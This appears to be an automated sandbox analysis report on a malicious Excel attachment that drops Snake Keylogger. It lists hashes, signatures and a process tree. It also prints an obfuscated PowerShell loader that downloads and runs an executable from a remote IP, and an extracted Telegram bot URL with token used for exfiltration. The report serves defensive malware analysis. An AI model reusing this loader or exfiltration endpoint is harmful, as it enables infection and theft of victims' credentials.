Analysis
-
max time kernel
117s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-10-2024 06:41
Static task
static1
Behavioral task
behavioral1
Sample
PaymentXConfirmationXcopy.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
PaymentXConfirmationXcopy.xls
Resource
win10v2004-20241007-en
General
-
Target
PaymentXConfirmationXcopy.xls
-
Size
848KB
-
MD5
5a232e6f517ecc2663439fcf2a28573d
-
SHA1
155a24515072423a751465a774fc6e3e24e21f84
-
SHA256
4af00aaa090c79876c7d3c1c337cdb5244f0b05689de4e22b7ed4a84bb8eb9d8
-
SHA512
a96e1d03f6155e30e236d4234c0c352911d3780cd59493ea8545296dc8b42c2befed3972adfbf0001df24023e522547d00bb2de68c27d729cf689487ad5b4f49
-
SSDEEP
12288:YmzHJE+CzldQD3DERnLRmF8D5JhuiC3LaQlOh4cjUVwUi4t7W:zczlWbARM8NTC3eQ0h4eU
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot8129252196:AAFb_vUYwennKVolbwpXf3vnDfT_yhozHns/sendMessage?chat_id=7004340450
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule behavioral1/memory/1332-71-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/1332-73-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/1332-72-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 3 IoCs
flow pid Process 10 2168 mshta.exe 11 2168 mshta.exe 13 2676 pOWeRSHEll.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 2676 pOWeRSHEll.exe 2832 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2972 wlanext.exe -
Loads dropped DLL 1 IoCs
pid Process 2676 pOWeRSHEll.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000700000001932a-63.dat autoit_exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk pOWeRSHEll.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2972 set thread context of 1332 2972 wlanext.exe 38 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOWeRSHEll.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wlanext.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2980 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2676 pOWeRSHEll.exe 2832 powershell.exe 2676 pOWeRSHEll.exe 2676 pOWeRSHEll.exe 1332 RegSvcs.exe 1332 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2972 wlanext.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2676 pOWeRSHEll.exe Token: SeDebugPrivilege 2832 powershell.exe Token: SeDebugPrivilege 1332 RegSvcs.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2972 wlanext.exe 2972 wlanext.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 2972 wlanext.exe 2972 wlanext.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2980 EXCEL.EXE 2980 EXCEL.EXE 2980 EXCEL.EXE 2980 EXCEL.EXE 2980 EXCEL.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2168 wrote to memory of 2676 2168 mshta.exe 31 PID 2168 wrote to memory of 2676 2168 mshta.exe 31 PID 2168 wrote to memory of 2676 2168 mshta.exe 31 PID 2168 wrote to memory of 2676 2168 mshta.exe 31 PID 2676 wrote to memory of 2832 2676 pOWeRSHEll.exe 34 PID 2676 wrote to memory of 2832 2676 pOWeRSHEll.exe 34 PID 2676 wrote to memory of 2832 2676 pOWeRSHEll.exe 34 PID 2676 wrote to memory of 2832 2676 pOWeRSHEll.exe 34 PID 2676 wrote to memory of 2952 2676 pOWeRSHEll.exe 35 PID 2676 wrote to memory of 2952 2676 pOWeRSHEll.exe 35 PID 2676 wrote to memory of 2952 2676 pOWeRSHEll.exe 35 PID 2676 wrote to memory of 2952 2676 pOWeRSHEll.exe 35 PID 2952 wrote to memory of 2420 2952 csc.exe 36 PID 2952 wrote to memory of 2420 2952 csc.exe 36 PID 2952 wrote to memory of 2420 2952 csc.exe 36 PID 2952 wrote to memory of 2420 2952 csc.exe 36 PID 2676 wrote to memory of 2972 2676 pOWeRSHEll.exe 37 PID 2676 wrote to memory of 2972 2676 pOWeRSHEll.exe 37 PID 2676 wrote to memory of 2972 2676 pOWeRSHEll.exe 37 PID 2676 wrote to memory of 2972 2676 pOWeRSHEll.exe 37 PID 2972 wrote to memory of 1332 2972 wlanext.exe 38 PID 2972 wrote to memory of 1332 2972 wlanext.exe 38 PID 2972 wrote to memory of 1332 2972 wlanext.exe 38 PID 2972 wrote to memory of 1332 2972 wlanext.exe 38 PID 2972 wrote to memory of 1332 2972 wlanext.exe 38 PID 2972 wrote to memory of 1332 2972 wlanext.exe 38 PID 2972 wrote to memory of 1332 2972 wlanext.exe 38 PID 2972 wrote to memory of 1332 2972 wlanext.exe 38 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PaymentXConfirmationXcopy.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2980
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\SysWOW64\WINDowsPOweRShEll\V1.0\pOWeRSHEll.exe"C:\Windows\systEm32\WINDowsPOweRShEll\V1.0\pOWeRSHEll.exe" "poweRshELl.ExE -Ex ByPass -nOp -w 1 -c DEVICEcrEdeNTiALdEpLOymENt ; IEx($(IeX('[sysTEM.TExT.eNcODiNG]'+[CHAr]58+[cHAr]58+'utf8.GEtStrIng([sYStEM.CONVert]'+[cHaR]58+[ChAR]58+'FRoMBASE64stRiNG('+[chaR]0X22+'JHpWV21LICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlZklOaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNb04uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVJdEd0RkxyayxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHlPaGNCWkMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnRFl3bFBXUURDLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHp1UyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFV3Z05LQ3FQWk8pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQ3RhaHNQek92IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUVzUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU0hrSyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHpWV21LOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNDUvNTYxL3dsYW5leHQuZXhlIiwiJEVuVjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3N0QVJ0LVNsRWVQKDMpO3NUQXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[chAR]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -nOp -w 1 -c DEVICEcrEdeNTiALdEpLOymENt3⤵
- Evasion via Device Credential Deployment
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rvapjjnk.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES903F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC903E.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2420
-
-
-
C:\Users\Admin\AppData\Roaming\wlanext.exe"C:\Users\Admin\AppData\Roaming\wlanext.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\wlanext.exe"4⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1332
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD567e486b2f148a3fca863728242b6273e
SHA1452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD5da323395f175e1189915da00e3bae9cc
SHA184740bd58dac0bc8f63ae5764d59c134669a43d7
SHA256ae817e2ad31fec8627e4f962172b523eb52ae1afc4e3167d419557b40f814ae5
SHA5128b9d925e809d3dc61e3950d0966a07a0b14b984e9909df76005e79ffef82a457f51fd70ed3b72fad0be3d10c46568773fe414a0f442369582eefc3743bea8462
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5fc50c8228403fac31ebfadd6ac876d3e
SHA13d8a3c43816dcc83e6e7572af6b8359a745c9835
SHA2560cf126dedbeda5ded79c1d3e54128e4beec0016148c98abbbe33593c361cf923
SHA51207920f563da575d23a07a54f644c742e146f2ba77d30d3accbfe97fe0fd61661690a2a091972543d137e78c4b2dee52b2cd0f3621d4613bf7498b0ed76c5fb6b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD5a08570005ef6675c093f8f72b0d364da
SHA1ffceebff1add9fcbaba63dce4c0fb6ad5078f0d7
SHA2565b04bf9c65aa77a50bf4e5682d2a84d2dd4931186c2800a3edafb7640a9cbb23
SHA512877d52abd2b54a6e9eaaccd17a3e7265cbf1924463e49b6a07f543f12b53b766bf0a12a98f182c3e71c71a789e46ec6cdaeccf99636e679f449645474e674fec
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\seethemagicalpersoninmylifewithherlifegoodforme[1].hta
Filesize8KB
MD524dcf722096ca6d02bbb70733ae01abc
SHA1fb8166a57aaf6d4837dfb686b84ee51474941c83
SHA256e0d07f596090db80fff8fb48b11999010611ac352534fadcf295c7ac47042bdd
SHA512bb055ad22ba25be389d212fe6517b28244234d259cb0dc870eb7691b6ac3f99ed1d3a8408552f3f1fed9d29313a4a14d5a3fc3c08c629790990a8229f8ab33da
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5c4305f26430eccedbe0c6d87ad841921
SHA1065c5329f48e96d9d9d6c578f3bd60ba846e2db3
SHA25624c29b87d4006c9f4551e4d2cc75efcecacbd598354fb43f83d212a1e1e6b02f
SHA512d8e09a0d9cdc1ee0ea4bdde736917982add9e44cd4d39ab8dc3a800dd79dc97e2595f9c916bbbc4889da9f019d649a586da527b9f6cee3b3b70c27ff19cff439
-
Filesize
3KB
MD520e66997952b31a9cdc4a6a6d03e7e07
SHA1a7214d74cde5f8c457e5cad0bbe30e09c89c44de
SHA256ab70b7082691baeebc199cc58580739933b60a151d052b443c3554df67ade532
SHA5127cbc7c920e0922637e08adf3e4201e1e8d7e48ceed6e49a1b3c336fbb1c3d224d7e2a901e79dc32904fe1a3769569ef646943554340b8d93fa7ada24e0c64a03
-
Filesize
7KB
MD59f0bf66a6a019abe368fba7f26033f15
SHA1fcae933609e8100958187e34eabe762411244d3f
SHA256dd1edc96142cf5db01d983a49051c06ab6b0b68af4b3fc3fdb638843cc7bfe92
SHA512fdd50fbdc42a7a7f5a40a969218984b0693b07aa29365ba8d0a47de6e31a495bb3195983f932ee8e60f3c2b6d05d1ae5952ff24228f05bc99f90c96a1f8dd669
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5a53a0674c160baf9ee6d3bb921be91ac
SHA13cf9b88ffe87d09576df184d923024a718fe13f8
SHA256e59a2c9e2607459bf395653104eaaca40b909771026070b025bd256deb1fb11d
SHA5123c44baf9346c485782d46f95c5b8f9892998ca8983158e4ec109c63c6e63a4ed111cc16eb98cfeeee1dbb167b7f0d2f1209468730bad5b53613cd7cbf6fda15f
-
Filesize
928KB
MD5ed7a5494d8b8fcb1044999a61e436ed7
SHA18295350be915d24bd3701e5b0ad9711dfc2f2f86
SHA256644357875a1b10ed205cf41b3dd8fe4f9f78be54b8dd07642e0648dd67177819
SHA512c138d6ee662be1fab2cd9b8418e3419414205797e1dd82a0b8a1455cfb0f23a6720cd686600049d8eb557b483b806e587693b22f3755e1e00f311d48cd968a33
-
Filesize
652B
MD5e29d578f7bed4aff2416fdb24ecb4bbd
SHA1b0684265f0ba718f19555ff45ef8fc0008e07a1f
SHA256e35bcdd5d78295559f4d56d3c890d344400a11089588065a37c00a8930341839
SHA5129e731c7ce7f7a6887c6766ef372a7331b1aa4e7c37a5d966acecde8b9af5bfb2143a3c410b666c92f75deefbe9b73a1d381a046868b69c2198096d4c4ac9913e
-
Filesize
483B
MD54c5d6a51b5bad9b89090a128b2676ef5
SHA113fbf9031d31d7c621c9fa9816818b341377d487
SHA256c849809f9d06a8ef3bbd4de89bc706fbd851231f8dfe9f8ed84800c9b67e80d7
SHA512a3f1573cee336b8efe076e8746e5a61e73d46b539cb5170f297262a5327e7b43e0c45cfe93682e93b92f20e878ae9e21e60502dbcdf492236ea642f15290601d
-
Filesize
309B
MD5a89db01772be3d87169dfd900aeec936
SHA1c29f98a757f507756cbcab544f8b32301ce94bb9
SHA256db6b7f70fb80aa4a2c1c0d541a852b3228c103b9394d902bc277bd6a5bbb5dd0
SHA51284cfb3017174344b94f5a5c672360ca41dc0ab0f44105c7141a00e76fc703fce2fe86f026117239c9ec5a329d313d54183012eb9a9f8cfa58bafa995ba78dfcd